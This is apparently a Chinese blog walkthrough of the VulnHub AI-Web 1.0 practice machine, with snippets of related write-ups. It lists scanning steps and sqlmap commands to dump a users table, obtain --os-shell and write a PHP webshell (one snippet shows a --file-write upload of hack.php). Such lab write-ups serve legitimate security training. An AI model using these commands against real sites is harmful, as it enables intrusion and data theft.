AI-web 1.0靶机

最新推荐文章于 2024-08-01 23:44:38 发布
最新推荐文章于 2024-08-01 23:44:38 发布
阅读量185 收藏
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67480384/article/details/140854720
版权

C段扫描
arp-scan -l
image.png
端口扫描
nmap ip地址 -sV -v -T4
image.png
使用dirb对网页进一步扫描
dir url
image.png
访问robots.txt
image.png
使用dirb 对两个目录分别进行扫描
dir url
image.png
发现info.php进行访问
image.png
扫描se3reTdir777
image.png
发现index.php页面,进行访问
image.png
考虑sql注入
image.png
image.png
burp抓包
image.png
sqlmap扫描列出数据库
sqlmap url --dbs
image.png
sqlmap url -D aiweb1 --tables
列出表名
image.png
sqlmap url -D aiweb1 -T users --columns
列出字段名
image.png
获取数据
sqlmap url -D aiweb1 -T users --dump
image.png
sqlmap url --os-shell
–os-shell获取shell
image.png
image.png
写入一句话木马
image.png
image.png
使用蚁剑进行连接
image.png
image.png

Sɪʟᴇɴᴛོ.498
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6297
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 1073
vulnhub ai-web1.0
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1426
在刚才信息收集中我们在robots.txt文件中发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件中我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件中)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
靶机通关|AI-WEB-1.0 靶机通关攻略
a96482的博客
07-30 689
python3 sqlmap.py -r '/home/kali/桌面/2.txt' --file-write --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php。python3 sqlmap.py -r '/home/kali/桌面/2.txt'--batch -D aiweb1 -T systemUser --dump。中发现提交框,开始尝试注入。写入成功,使用蚁剑连接。连接成功,通关完成。
Ai-web-1.0靶机中的骚操作
weixin_51692662的博客
11-05 351
sqlmap、反弹shell、passwd提权、Ai-web-1.0
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1417
vulnhub靶机AI-Web-1.0渗透笔记
VulnhubAI-web 1.0靶机详解
weixin_62457642的博客
08-01 786
靶机AI-web1.0速刷
Vulnhub靶机AI-WEB-1.0
weixin_68416970的博客
05-22 1023
Vulnhub靶机AI-WEB-1.0AI-WEB-1.0是一个专门设计用来测试渗透测试者技能的靶机。这个靶机的目标是从/root/flag.txt获取flag,获得低权限的shell,然后将权限提升到root。
AI-WEB-1.0 靶机
weixin_53736204的博客
07-29 433
下载地址:下载压缩文件打开开启虚拟机。
Vulnhub靶机AI-Web-1.0
羊柳树的博客
01-20 4200
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
DC-4-Web渗透测试靶机
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
sqli-labs-master靶机
10-12
5. 运行靶机,启动web服务器,然后通过浏览器访问挑战页面开始学习。 三、CMS.rar——内容管理系统模拟 CMS.rar可能包含了一个模拟常见内容管理系统的环境,用于演示如何在实际的CMS应用中发现和利用SQL注入。常见...
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
安装部署Web安全测试用的靶机
11-24
本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是一个集成的Web服务器套件,包含了Apache、MySQL、PHP和Perl等组件...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8395
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
工业视觉智能-分割模型基础知识
08-18
根据《阿里云工业视觉智能高级工程师ACP认证免费课程》(https://edu.aliyun.com/course/3128115/lesson/342981389)创建的个人笔记
计算机毕业设计jsp高考志愿选择辅助系统idea论文
最新发布
08-18
计算机毕业设计jsp高考志愿选择辅助系统idea论文
分享一款特别好看特别美的樱花博客前端页面
08-18
分享一款特别好看特别美的樱花博客前端页面
sqlmap进行os-shell需要靶机开启3306端口和MYSQL远程登陆吗
07-13
对于SQLMap进行OS shell(操作系统级别的命令执行)攻击,通常情况下需要满足以下两个条件: 1. 目标靶机上的MySQL服务需要启用远程登录功能,允许从远程主机连接。这通常涉及修改MySQL配置文件(如`my.cnf`或`my.ini`),确保`bind-address`参数设置为允许远程连接(通常为`0.0.0.0`)或者注释掉该参数。 2. 目标靶机上的MySQL服务需要监听在一个网络可访问的端口上,通常是默认的3306端口。 如果目标靶机满足上述条件,SQLMap就可以通过与目标数据库建立连接并执行操作系统命令,从而实现OS shell攻击。 然而,值得注意的是,远程登录MySQL并执行操作系统命令是一种非常危险的行为,可能导致系统的安全风险。在真实环境中,为了保护系统安全,通常不会将MySQL服务直接暴露在公共网络上,或者限制只允许特定IP地址进行远程登录。 因此,在进行SQL注入测试时,请确保已经获得合法的授权,并且目标靶机是在受控环境中进行测试。同时,遵守法律法规和道德规范,仅在合法授权范围内进行测试和攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值